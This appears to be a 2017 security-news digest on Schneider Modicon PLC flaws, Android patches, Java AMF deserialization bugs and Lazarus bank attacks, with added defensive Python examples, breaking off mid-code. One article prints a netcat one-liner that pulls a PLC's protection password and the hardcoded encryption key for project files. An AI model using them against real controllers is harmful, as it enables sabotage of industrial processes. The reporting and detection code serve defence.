Following the disclosure, Schneider Electric confirmed that the Modicon family of PLCs is vulnerable to the findings presented by CRITIFENCE and released an Important Cybersecurity Notification (SEVD-2017-065-01). ICS-CERT, part of the Department of Homeland Security (DHS), released an advisory earlier this morning. The underlying flaw, confirmed by Schneider Electric, lets an attacker easily guess the weak session key (1 byte, so only 256 possibilities) or simply sniff it off the wire. With the session key, the attacker gains full control of the controller: reading the controller’s program and writing it back with malicious code.

“The recovery process from this type of cyber-attack can be very hard and slow in most cases due to the lack of management resources in the field of SCADA and process automation. A slow recovery process multiplied by the number of devices that need to be fixed, as well as configuration restoration, makes the recovery process very painful,” says Mr. Alexey Baltacov, Critical Infrastructure Architect at CRITIFENCE.


“Recovering from such an attack would be a slow and tedious process, and prone to many failures. Every plant using PLCs as part of a production line would have dozens of these devices all around the plant. Let’s assume that each PLC is indeed backed up to its recent configuration. It would take a painstakingly long time to recover each and every one of them to its original status,” says Mr. Eyal Benderski, Head of the Critical Infrastructure and SCADA/ICS Cyber Threats Research Group at CRITIFENCE. “This restoration process would take a long time, during which the plant would be completely shut down. The costs of that shutdown could be substantial, and for critical processes it could affect more than the down-time, as is the case with energy plants. Consider a process which relies on keeping a constant temperature for a biological agent or chemical process. Breaking the process chain could require re-initialization that may be days and weeks long. Furthermore, since dealing with the OT network is much more complicated for operational reasons, on many occasions plants don’t even have up-to-date backups, which would require complete reconfiguration of the manufacturing process. Given these complications, plants would very much prefer paying the ransom to dealing with the minor chance that the backups will work as expected. Lastly, let’s assume the backups went on-air as soon as possible; what would prevent the same attack from recurring, even after paying?”

About the author:


CRITIFENCE is a leading Critical Infrastructure, SCADA and Industrial Control Systems cyber security firm. The company developed and provides SCADAGate+, a unique passive cyber security technology designed for Critical Infrastructure, SCADA and Industrial Control Systems visibility and vulnerability assessment, which allows monitoring, controlling and analyzing OT network cyber security events and vulnerabilities easily and entirely passively. CRITIFENCE’s development team and its Critical Infrastructure and SCADA/ICS Cyber Threats Research Group are made up of experienced SCADA and cyber security experts and researchers from the IDF’s Technology & Intelligence Unit 8200 (Israel’s NSA) and the Israeli Air Force (IAF).

For more information about CRITIFENCE refer to: http://www.critifence.com


Google Patches 31 Critical Flaws in Android

5.4.2017 secureweek Vulnerebility

Google this week released security updates for Android to resolve numerous Critical remote code execution (RCE) and elevation of privilege (EoP) vulnerabilities in the platform.

Over 100 vulnerabilities were resolved in Android this month, split into two separate sets of patches. A total of 23 bugs were addressed with 2017-04-01 security patch level, including 6 Critical vulnerabilities, 9 rated High risk and 8 Moderate.

There were 6 Critical RCE issues affecting Mediaserver; High risk flaws such as EoPs in CameraBase, Audioserver, and SurfaceFlinger; information disclosure in Mediaserver; and denial of service (DoS) vulnerabilities in libskia and Mediaserver.

The Moderate severity issues included EoP bugs in libnl and Telephony, along with information disclosure vulnerabilities in Mediaserver, libskia, and Factory Reset. Overall, Google patched 15 flaws in Mediaserver this month, which shows once again that it remains one of the most bug-prone components in Android, almost two years after the Stagefright bug was found in it.

The 2017-04-05 security patch level resolves a total of 79 vulnerabilities, 25 of which were rated Critical severity, 39 have a High rating, and 15 are considered Moderate risk, Google’s advisory reveals.

One of the most severe of these vulnerabilities was a RCE issue in Broadcom Wi-Fi firmware. Tracked as CVE-2017-0561 and found by Google Project Zero researcher Gal Beniamini, the issue impacts Nexus, Samsung, and smartphones from other vendors as well. Apple’s iOS was also impacted by the bug, and the company released an emergency fix for it earlier this week.

19 other Critical issues were addressed in various Qualcomm components and were released as part of Qualcomm AMSS security bulletins between 2014 and 2016 (a 20th vulnerability considered only High risk was also counted here in Google’s advisory).

The rest of the Critical flaws included RCE issues in kernel networking subsystem and Qualcomm crypto engine driver, along with EoP bugs in MediaTek touchscreen driver, HTC touchscreen driver, and kernel ION subsystem.

The remaining 38 High risk vulnerabilities in this patch level were mostly EoP bugs in kernel sound subsystem, and various drivers, but 2 RCE flaws (in v8 and Freetype), four information disclosure issues (in kernel memory and kernel networking subsystems, Qualcomm TrustZone, and Qualcomm IPA driver), and two DoS flaws (in kernel networking subsystem and Qualcomm Wi-Fi driver) were also resolved.

The 15 Moderate risk issues included EoP and information disclosure issues in various drivers from Qualcomm, Broadcom, and Nvidia (one EoP was addressed in HTC OEM fastboot command and one information disclosure was resolved in kernel media driver).


Flaws in Java AMF Libraries Allow Remote Code Execution

5.4.2017 secureweek Vulnerebility
Deserialization-related vulnerabilities found in several Java implementations of AMF3 can be exploited for unauthenticated remote code execution and XXE attacks, warned CERT/CC.

The security holes were reported to CERT/CC and vendors by Markus Wulftange, senior penetration tester at Code White. Patches have been made available for some of the affected products.

Serialization is the process where an object is converted to a stream of bytes in order to store or transmit that object to memory or a file. The process in which serialized data is extracted is called deserialization and it can lead to significant security flaws if not handled properly.

AMF3, the latest version of Adobe’s Action Message Format, is a compact binary format used to serialize ActionScript object graphs. AMF was first introduced in Flash Player 6 in 2001 and AMF3 has been around since Flash Player 9.

There have been several reports in the past few years about remote code execution vulnerabilities introduced into Java-based applications by unsafe deserialization of untrusted data.

Wulftange has discovered that some Java implementations of AMF3 deserializers introduce potentially serious vulnerabilities, allowing unauthenticated attackers to remotely execute code or cause a denial-of-service (DoS) condition. An XXE flaw reported by the researcher can also lead to disclosure of sensitive data on the server.

CERT/CC’s advisory mentions three vulnerabilities. The first flaw allows an attacker who can spoof or control an RMI (Remote Method Invocation) server to execute code. This security hole is said to affect Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

The second vulnerability can also be exploited for arbitrary code execution by an attacker who can spoof or control information. This weakness impacts Flamingo, Apache’s Flex BlazeDS and GraniteDS. The XXE flaw has been found to affect the same products along with WebORB.

Some of the vulnerable libraries, such as GraniteDS and Flamingo, have been discontinued. Atlassian and Apache have released patches for the flaws impacting their products.

According to CERT/CC, products from HPE, SonicWall and VMware could also be affected. The organization has advised developers to use versions of JDK that implement serialization blacklisting filters and ensure that their products properly handle deserialized data from untrusted sources.
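The fix CERT/CC points to, a JDK serialization filter, is Java-specific, but the idea behind it (the deserializer refuses to resolve any class not on an allowlist, so an attacker-supplied reference never reaches a constructor or a method call) is easier to show in a small Python analogue. The following is an added example, not code from any of the AMF libraries or from CERT/CC: Python’s `pickle` stands in for the Java/AMF3 object stream, `Gadget` is a constructed stand-in for a deserialization gadget, and the harmless `os.getpid` plays the role of the attacker’s chosen call.

```python
import io
import os
import pickle


class Gadget:
    """Constructed stand-in for a deserialization gadget: the serialized form of
    this object instructs the loader to call a function the sender chose.
    os.getpid is a harmless placeholder for os.system or a JNDI/RMI lookup."""

    def __reduce__(self):
        return (os.getpid, ())


ATTACKER_STREAM = pickle.dumps(Gadget())                              # untrusted input
BENIGN_STREAM = pickle.dumps({"user": "alice", "roles": ["reader"]})  # what the app expects


def unsafe_load(data):
    """Vulnerable: resolves and invokes whatever global the stream names."""
    return pickle.loads(data)


# The only (module, name) references the application legitimately needs.
ALLOWED_GLOBALS = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str")}


class AllowlistUnpickler(pickle.Unpickler):
    """Same stream format, but every global reference is checked first; this is
    the role a JDK ObjectInputFilter plays for Java serialization."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_load(data):
    """Hardened loader: aborts at the disallowed reference, before it is called."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


def safe_load_rejects(data):
    """True if the hardened loader refuses the stream."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("unsafe loader ran attacker's call, got:", unsafe_load(ATTACKER_STREAM))
    print("hardened loader rejects it:", safe_load_rejects(ATTACKER_STREAM))
    print("hardened loader still loads benign data:", safe_load(BENIGN_STREAM))
```

The allowlist is the point: a denylist of known gadget classes (the approach CERT/CC calls blacklisting filters) has to be updated every time a new gadget chain is published, whereas an allowlist of the handful of types the endpoint actually exchanges does not. Plain data types that carry no class reference at all, like the dictionary above, pass either way.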


Cyberspies Target Middle East With Windows, Android Malware

5.4.2017 secureweek Android
A cyberespionage group apparently not linked to any previously known threat actor has been using several Windows and Android malware families in attacks aimed at organizations in the Middle East.

The first report on this group’s activities was published last month by Chinese security firm Qihoo 360, which tracks the actor as APT-C-23 and Two-Tailed Scorpion. Researchers at Palo Alto Networks and ClearSky have also conducted a joint investigation into the gang’s operations.

According to the security firms, the group uses Windows and Android malware to spy on victims. Qihoo 360 said it observed nearly 85 percent of infections in Palestine, followed by Israel, but Palo Alto also reported seeing victims in Egypt and the United States.

As for the types of organizations targeted, Qihoo reported that educational institutions appeared to be the main target, followed by military organizations, while Palo Alto mentioned media companies.

Palo Alto Networks and ClearSky have dubbed the Windows malware families used by these cyberspies KASPERAGENT and MICROPSIA. The Android threats are being tracked as SECUREUPDATE and VAMP.

The attackers delivered their malware using fake news websites and spear-phishing emails containing Bit.ly shortened links. Two of the Bit.ly links analyzed by researchers had been clicked hundreds of times.

KASPERAGENT, named so based on a “Kasper” string found in several of the analyzed samples, is used as a reconnaissance tool and downloader for other payloads. However, some of the samples include additional capabilities that allow the hackers to steal passwords from Chrome and Firefox, take screenshots, log keystrokes, execute arbitrary commands, exfiltrate files, and update the malware.

The second Windows malware family used by Two-Tailed Scorpion is MICROPSIA, which allows attackers to log keystrokes, capture screenshots, and steal Office documents.

Researchers initially found no connection between the two malware families, but they eventually uncovered a link: an email address used to register the command and control (C&C) domains.

Some of the domains registered with that email address were also found to host Android malware disguised as harmless applications. One of them is SECUREUPDATE, a backdoor that acts as a downloader for other malware.

The second Android malware is VAMP, which can record calls, harvest contact information, access messages, and steal documents from the infected device.

Both the Android and Windows malware attacks also involve phishing websites that attempt to trick users into handing over their credentials.

Palo Alto has discovered roughly 200 samples of the Windows malware and 17 Android malware samples. The security firm has been monitoring the threat since March 2016, but the KASPERAGENT malware had been used since at least July 2015.

“Through this campaign there is little doubt that the attackers have been able to gain a great deal of information from their targets,” explained Palo Alto Networks researchers. “The scale of the campaign in terms of sheer numbers of samples and the maintenance of several different malware families involved suggests a reasonably sized team and that the campaign is not being perpetrated by a lone wolf, but rather a small team of attackers.”


Researchers Disclose Unpatched Flaws in Schneider Electric PLCs

5.4.2017 secureweek Vulnerebility
Researchers have disclosed the details of two vulnerabilities affecting some of Schneider Electric’s Modicon programmable logic controllers (PLCs) after the vendor failed to provide any status updates or feedback.

A team of experts from Germany-based OpenSource Security discovered the flaws in Schneider’s Modicon M221 PLCs, namely TM221CE16R running firmware version 1.3.3.3.

According to advisories published on Tuesday by the researchers, the vulnerabilities are critical and they can be easily exploited.

One of the flaws is related to the fact that the Project Protection feature, designed to prevent unauthorized access to project files, uses a hardcoded encryption key.

The project’s password is stored in an XML file that is encrypted using the AES algorithm in CBC mode. The problem is that the encryption key is the same for all systems and it cannot be changed, allowing an attacker to decrypt the XML file and obtain the password set by the user.

The password can then be used to access and modify a project via SoMachine Basic, the software designed for programming Modicon controllers.

The second vulnerability is related to the Application Protection feature, which prevents the transfer of an application from a PLC to a SoMachine Basic project. Researchers discovered that sending a simple command via Modbus to the controller on TCP port 502 will return the Application Protection password in clear text.

The password can be used via the SoMachine software to download applications from the controller, modify them and upload them back to the device.
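Both the M221 password disclosure above and the UMAS session-key weakness in the ClearEnergy article earlier on this page come down to the same fact: on TCP port 502 the controller answers whoever can reach it, with at most a 1-byte session key in the way. Until firmware is fixed, the practical control is to see, and then restrict, who is sending programming traffic to PLCs. The script below is an added example, not CRITIFENCE’s, OpenSource Security’s or Schneider Electric’s code: it parses the Modbus/TCP MBAP header, flags UMAS (function code 0x5A, Schneider’s programming protocol carried over Modbus) and standard Modbus write functions from hosts outside a constructed engineering-workstation allowlist, and runs over constructed sample frames. The UMAS payload bytes are placeholders and do not reproduce either attack.

```python
import struct
from ipaddress import ip_address

UMAS_FUNCTION = 0x5A                        # Schneider UMAS rides on Modbus function 90
WRITE_FUNCTIONS = {0x05, 0x06, 0x0F, 0x10}  # coil and register write functions
MODBUS_PORT = 502

# Constructed allowlist: the only hosts that should ever program or write to PLCs.
ENGINEERING_HOSTS = {ip_address("192.0.2.10")}


def parse_modbus_tcp(payload):
    """Parse the 7-byte MBAP header plus function code of a Modbus/TCP request."""
    if len(payload) < 8:
        raise ValueError("frame too short for MBAP header + function code")
    tid, proto, length, unit, func = struct.unpack("!HHHBB", payload[:8])
    if proto != 0:
        raise ValueError("protocol identifier is not 0: not Modbus/TCP")
    if length != len(payload) - 6:          # length counts unit id + PDU
        raise ValueError("MBAP length field does not match frame size")
    return {"tid": tid, "unit": unit, "function": func, "data": payload[8:]}


def triage_flows(flows, engineering_hosts=ENGINEERING_HOSTS):
    """flows: iterable of (src_ip, dst_port, payload). Returns (src_ip, reason) findings."""
    findings = []
    for src, dport, payload in flows:
        if dport != MODBUS_PORT:
            continue
        try:
            frame = parse_modbus_tcp(payload)
        except ValueError as exc:
            findings.append((src, f"MALFORMED: {exc}"))
            continue
        trusted = ip_address(src) in engineering_hosts
        if frame["function"] == UMAS_FUNCTION and not trusted:
            findings.append((src, "UMAS (0x5A) programming traffic from non-engineering host"))
        elif frame["function"] in WRITE_FUNCTIONS and not trusted:
            findings.append((src, f"Modbus write function 0x{frame['function']:02X} "
                                  "from non-engineering host"))
    return findings


def mbap(tid, unit, func, data):
    """Build a Modbus/TCP frame; the length field covers unit id + function + data."""
    return struct.pack("!HHHBB", tid, 0, 2 + len(data), unit, func) + data


# Constructed sample traffic: a legitimate read from the engineering host, a UMAS
# request and a register write from a host that is not on the allowlist, and a
# non-Modbus flow that is ignored.  The UMAS payload bytes are placeholders.
SAMPLE_FLOWS = [
    ("192.0.2.10", 502, mbap(1, 1, 0x03, struct.pack("!HH", 0, 10))),   # read holding regs
    ("198.51.100.23", 502, mbap(2, 1, UMAS_FUNCTION, b"\x00\x02")),      # UMAS from stranger
    ("198.51.100.23", 502, mbap(3, 1, 0x06, struct.pack("!HH", 5, 1))),   # write single reg
    ("198.51.100.23", 80, b"GET / HTTP/1.0\r\n\r\n"),                      # not Modbus
]

if __name__ == "__main__":
    for src, reason in triage_flows(SAMPLE_FLOWS):
        print(src, reason)
```

Feed it from a span port or a packet capture of the OT segment; the same allowlist then becomes the firewall rule between the engineering VLAN and the PLCs, which is the mitigation that does not depend on the vendor shipping a patch.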

The researchers said they reported their findings to Schneider Electric on December 23, but the only information they got from the vendor was the confirmation that the vulnerability report had been received.

Contacted by SecurityWeek, Schneider Electric admitted making a mistake and promised to share mitigation advice for these flaws as soon as possible on its cybersecurity support portal.

“Schneider Electric acknowledges the security note on its product Modicon TM221CE16R, Firmware 1.3.3.3, disclosed by OpenSource Security,” the company said in an emailed statement.

“Conscious about user Cyber Security concerns, Schneider Electric places a high priority on the evaluation of security research as it becomes available and produces documentation to advise users on mitigations that can be taken if they are required. Because of an issue in our standard process for interactions with cybersecurity advisory & consulting firms, we have missed the opportunity to respond to the researchers from OpenSource Security (Simon Heming, Maik Brüggemann, Hendrik Schwartke, Ralf Spenneberg) and offer mitigation to users, and we do apologize for this. We’re reviewing and updating our processes to make sure such a situation never happens again,” the company added.

Schneider Electric recently notified customers about the availability of patches and mitigations for three vulnerabilities affecting some of its Modicon PLCs.


Lazarus Under The Hood
5.4.2017 Kaspersky CyberCrime
Download full report (PDF)

In February 2017 an article in the Polish media broke the silence on a long-running story about attacks on banks, allegedly related to the notorious Lazarus Group. While the original article didn’t mention Lazarus Group, it was quickly picked up by security researchers. Today we’d like to share some of our findings, adding to what is currently common knowledge about Lazarus Group activities and their connection to the much discussed February 2016 incident, when an unknown attacker attempted to steal up to $851 million from Bangladesh Central Bank.

Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist. One such publication was released by BAE Systems in May 2016, but it only included analysis of the wiper code. This was followed by a blogpost by Anomali Labs, confirming the same wiping code similarity. That similarity satisfied many readers; at Kaspersky Lab, however, we were looking for a stronger connection.

Other claims that Lazarus was the group behind attacks on the Polish financial sector came from Symantec in 2017, which noticed string reuse in malware at one of its Polish customers. Symantec also confirmed seeing the Lazarus wiper tool at a customer in Poland. From this alone, however, it is only clear that Lazarus might have attacked Polish banks.

While all these facts are fascinating, the link between Lazarus and the compromise of banks’ SWIFT-connected systems was still loose. The only case where malware specifically targeting the bank’s infrastructure for connecting to the SWIFT messaging server was discovered is the Bangladesh Central Bank case. However, while almost everybody in the security industry has heard about the attack, few technical details from the on-site investigation have been revealed to the public. Considering that post-hack media publications mentioned that the investigation stumbled upon three different attackers, it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions, or whether Lazarus had in fact developed its own malware to attack banks’ systems.

We would like to add some strong facts that link some attacks on banks to Lazarus, and share some of our own findings as well as shed some light on the recent TTPs used by the attacker, including some yet unpublished details from the attack in Europe in 2017.

This is the first time we announce some Lazarus Group operations that have thus far gone unreported to the public. We have had the privilege of investigating these attacks and helping with incident response at a number of financial institutions in South East Asia and Europe. With cooperation and support from our research partners, we have managed to address many important questions about the mystery of Lazarus attacks, such as their infiltration method, their relation to attacks on SWIFT software and, most importantly, shed some light on attribution.


Lazarus attacks are not a local problem; the group’s operations clearly span the whole world. We have seen their infiltration tools detected in multiple countries in the past year. Lazarus was previously known for cyberespionage and cybersabotage, such as the attack on Sony Pictures Entertainment, in which volumes of internal data were leaked and many hard drives in the company were wiped. Their interest in financial gain is relatively new, considering the age of the group, and it seems that a different set of people works on the problems of invisible money theft and the generation of illegal profit. We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations, while a substantially smaller unit within the group, which we have dubbed Bluenoroff, is responsible for financial profit.

The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many. Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.

To date, we’ve seen Bluenoroff attack four main types of targets:

Financial institutions
Casinos
Companies involved in the development of financial trade software
Crypto-currency businesses
Here is the full list of countries where we have seen Bluenoroff watering hole attacks:

Mexico
Australia
Uruguay
Russian Federation
Norway
India
Nigeria
Peru
Poland
Of course, not all attacks were as successful as the Polish attack case, mainly because in Poland they managed to compromise a government website. This website was frequently accessed by many financial institutions making it a very powerful attack vector. Nevertheless, this wave of attacks resulted in multiple infections across the world, adding new hits to the map we’ve been building.

One of the most interesting discoveries about Lazarus/Bluenoroff came from one of our research partners who completed a forensic analysis of a C2 server in Europe used by the group. Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2. Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.


In addition, the operator installed off-the-shelf cryptocurrency mining software to mine Monero. The software consumed system resources so intensely that the system became unresponsive and froze. This could be why the server was never properly cleaned, and its logs were preserved.

This is the first time we have seen a direct link between Bluenoroff and North Korea. Their activity spans from backdoors to watering hole attacks and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. So is North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculation. Still, seeing that IP in the C2 log does make North Korea a key part of the Lazarus/Bluenoroff equation.
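The forensic result above (operator sessions from proxies and VPNs in several countries, and one short connection from an unusual range) is the kind of thing a first-pass triage of the Tomcat access log surfaces, provided the log survived. The script below is an added example and is not part of Kaspersky’s report or its partner’s forensic work: it parses Tomcat’s default “common” access-log pattern over a constructed excerpt (documentation-range addresses, a placeholder `/c2.jsp` path), and lists sources that fall inside a watched prefix or that made only a single request. The watchlist prefix is a stand-in, not the range from the actual case.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed log excerpt; addresses are documentation ranges, not real operator IPs,
# and the last line is deliberately not a log record.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Jan/2017:03:14:07 +0000] "GET /c2.jsp HTTP/1.1" 200 12
198.51.100.7 - - [12/Jan/2017:03:14:22 +0000] "POST /c2.jsp HTTP/1.1" 200 84
203.0.113.44 - - [12/Jan/2017:03:15:01 +0000] "POST /c2.jsp HTTP/1.1" 200 84
192.0.2.9 - - [12/Jan/2017:03:16:40 +0000] "GET /c2.jsp HTTP/1.1" 200 12
this line is not an access-log record
""".splitlines()

# Constructed stand-in for the "unusual" range an analyst would watch for.
WATCHLIST = [ip_network("192.0.2.0/24")]


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def triage_access_log(lines, watchlist, min_requests=2):
    """Group requests by source and single out the sources worth a second look:
    anything inside a watched range, and sources with fewer than min_requests
    hits (a short connection, like the one described above)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                      # skip unparseable lines, keep going
        per_ip[rec["ip"]].append(rec)
    findings = []
    for ip, recs in per_ip.items():
        addr = ip_address(ip)
        if any(addr in net for net in watchlist):
            findings.append(("WATCHLIST", ip, len(recs)))
        if len(recs) < min_requests:
            findings.append(("SHORT_SESSION", ip, len(recs)))
    return sorted(findings)


if __name__ == "__main__":
    for kind, ip, count in triage_access_log(SAMPLE_LOG, WATCHLIST):
        print(f"{kind:14} {ip:16} requests={count}")
```

On a real server the interesting sources are then pivoted against the Terminal Services logon events and the Tomcat deployment timestamps, since the operator here set the server up interactively before testing the backdoor against it.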

Conclusions

Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. Activity has been surging since 2011 and didn’t disappear after Novetta published the results of its Operation Blockbuster research, in which we also participated. The hundreds of samples collected give the impression that Lazarus is operating a malware factory that produces new samples on multiple independent conveyors.

We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers. Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.

Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, the same code and the same algorithms. “Keep morphing!” seems to be their internal motto. The rare cases in which they are caught with the same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.

This level of sophistication is something that is not generally found in the cybercriminal world. It’s something that requires strict organisation and control at all stages of operation. That’s why we think that Lazarus is not just another APT actor.

Of course such processes require a lot of money to keep running, which is why the appearance of the Bluenoroff subgroup within Lazarus was logical.

Bluenoroff, being a subgroup of Lazarus, focuses on financial attacks only. This subgroup has reverse engineering skills: they spend time tearing apart legitimate software and implementing patches for SWIFT Alliance software in their attempts to find ways to steal large sums of money. Their malware is different, and they aren’t exactly soldiers who hit and run. Instead, their tools leave an execution trace so that a problem can be reconstructed and quickly debugged. They are field engineers who arrive once the ground has been cleared by the conquest of new lands.

One of Bluenoroff’s favorite strategies is to silently integrate into running processes without breaking them. From the code we’ve seen, it looks as if they are not exactly looking for a hit and run solution when it comes to money theft. Their solutions are aimed at invisible theft without leaving a trace. Of course, attempts to move around millions of USD can hardly remain unnoticed, but we believe that their malware might be secretly deployed now in many other places and it isn’t triggering any serious alarms because it’s much more quiet.

We would like to note that in all of the attacks against banks that we have analyzed, the SWIFT software running on the banks’ servers has not demonstrated or exposed any specific vulnerability. The attacks were focused on banking infrastructure and staff: exploiting vulnerabilities in commonly used software or websites, bruteforcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for their administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate the software running on the system as they wish. There is not much that can stop them, because from a technical perspective their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database. Therefore, in all the breaches we have analyzed, SWIFT as an organization has not been at direct fault. More than that, we have witnessed SWIFT trying to protect its customers by implementing the detection of database and software integrity issues. We believe that this is a step in the right direction and these activities should be extended with full support. Making those integrity checks harder to patch out would pose a serious threat to the success of future operations run by Lazarus/Bluenoroff against banks worldwide.

To date, the Lazarus/Bluenoroff group has been one of the most successful in launching large scale operations against the financial industry. We believe that they will remain one of the biggest threats to the banking sector, finance and trading companies, as well as casinos for the next few years. We would like to note that none of the financial institutions we helped with incident response and investigation reported any financial loss.

As usual, defense against attacks such as those from Lazarus/Bluenoroff should include a multi-layered approach. Kaspersky products include special mitigation strategies against this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:

Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lazarus/Bluenoroff actor and share new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.


Flaws in Java AMF Libraries Allow Remote Code Execution

5.4.2017 securityweek Vulnerability

Deserialization-related vulnerabilities found in several Java implementations of AMF3 can be exploited for unauthenticated remote code execution and XXE attacks, warned CERT/CC.

The security holes were reported to CERT/CC and vendors by Markus Wulftange, senior penetration tester at Code White. Patches have been made available for some of the affected products.

Serialization is the process of converting an object into a stream of bytes so that it can be stored in memory or a file, or transmitted over a network. The reverse process, in which an object is reconstructed from serialized data, is called deserialization, and it can lead to significant security flaws if the incoming data is not handled properly.

AMF3, the latest version of Adobe’s Action Message Format, is a compact binary format used to serialize ActionScript object graphs. AMF was first introduced in Flash Player 6 in 2001 and AMF3 has been around since Flash Player 9.

There have been several reports in the past few years about remote code execution vulnerabilities introduced in Java-based applications due to inadequate serialization implementations.

Wulftange has discovered that some Java implementations of AMF3 deserializers introduce potentially serious vulnerabilities, allowing unauthenticated attackers to remotely execute code or cause a denial-of-service (DoS) condition. An XXE flaw reported by the researcher can also lead to disclosure of sensitive data on the server.

CERT/CC’s advisory mentions three vulnerabilities. The first flaw allows an attacker who can spoof or control an RMI (Remote Method Invocation) server to execute code. This security hole is said to affect Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

The second vulnerability can also be exploited for arbitrary code execution by an attacker who can spoof or control information. This weakness impacts Flamingo, Apache’s Flex BlazeDS and GraniteDS. The XXE flaw has been found to affect the same products along with WebORB.

Some of the vulnerable libraries, such as GraniteDS and Flamingo, have been discontinued. Atlassian and Apache have released patches for the flaws impacting their products.

According to CERT/CC, products from HPE, SonicWall and VMware could also be affected. The organization has advised developers to use versions of JDK that implement serialization blacklisting filters and ensure that their products properly handle deserialized data from untrusted sources.


Still problems for Schneider Electric, Schneider Modicon TM221CE16R has a hardcoded password
5.4.2017 securityaffairs Security

The firmware running on the Schneider Modicon TM221CE16R (Firmware 1.3.3.3) has a hardcoded password, and there is no way to change it.
I believe it is very disconcerting to find systems inside critical infrastructure affected by easy-to-exploit vulnerabilities while we are discussing the EU NIS directive.

What about hard-coded passwords inside critical systems?

Unfortunately, it has happened again: the firmware running on the Schneider Modicon TM221CE16R (Firmware 1.3.3.3) has a hardcoded password. The bad news for users is that they cannot change the password and there is no firmware update available to fix the issue.

The firmware encrypts the XML file containing the user name and password with the fixed key “SoMachineBasicSoMachineBasicSoMa”.

It is quite easy for an attacker to open the control environment (SoMachine Basic 1.4 SP1), decrypt the file, and take control over the device.

“The password for the project protection of the Schneider Modicon TM221CE16R is hard-coded and cannot be changed,” reads the security advisory published by Simon Heming, Maik Brüggemann, Hendrik Schwartke and Ralf Spenneberg of Germany’s Open Source Security. “The protection of the application is not existent.”

Schneider Modicon TM221CE16R

The same team of researchers discovered another security issue affecting the Schneider Modicon TM221CE16R with firmware 1.3.3.3. The password used to protect the application can be retrieved by a remote, unauthenticated user. Application Protection is meant to prevent the transfer of the application from the logic controller into a SoMachine Basic project.

“The password for the application protection of the Schneider Modicon TM221CE16R can be retrieved without authentication. Subsequently the application may be arbitrarily downloaded, uploaded and modified. CVSS 10.” reads a separate security advisory published by the team.

The experts found that a user only needs to send the following command over Modbus to TCP port 502:

echo -n -e '\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00' | nc IP 502
“After that the retrieved password can be entered in SoMachine Basic to download, modify and subsequently upload again any desired application”, continues the advisory.
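The one-liner above is a raw Modbus/TCP request. The following Python helpers, added here as an example and not part of the Open Source Security advisory, decode that exact byte string into its fields, rebuild it from those fields, and show the monitoring check a defender would want: flagging any host that sends function code 0x5a to a PLC. The MBAP header layout is the standard Modbus/TCP one; 0x5a (90) is the function code Schneider uses for its UMAS protocol. The trailing bytes 00 03 00 are copied verbatim from the advisory, whose meaning the page does not document, and the traffic sample is constructed.

```python
"""Modbus/TCP frame helpers for the TM221CE16R password-retrieval check.

Added example; it is not part of the Open Source Security advisory. The byte
string below is exactly what the advisory pipes to `nc IP 502`. A Modbus/TCP
ADU is a 7-byte MBAP header (transaction id, protocol id = 0, length, unit
id) followed by a function code and its data. Function code 0x5a (90) is not
a standard public function; Schneider uses it for its UMAS protocol. The
data bytes 00 03 00 are copied as-is; nothing is assumed about their meaning.
"""
import struct

MODBUS_TCP_PORT = 502
FC_SCHNEIDER_UMAS = 0x5A
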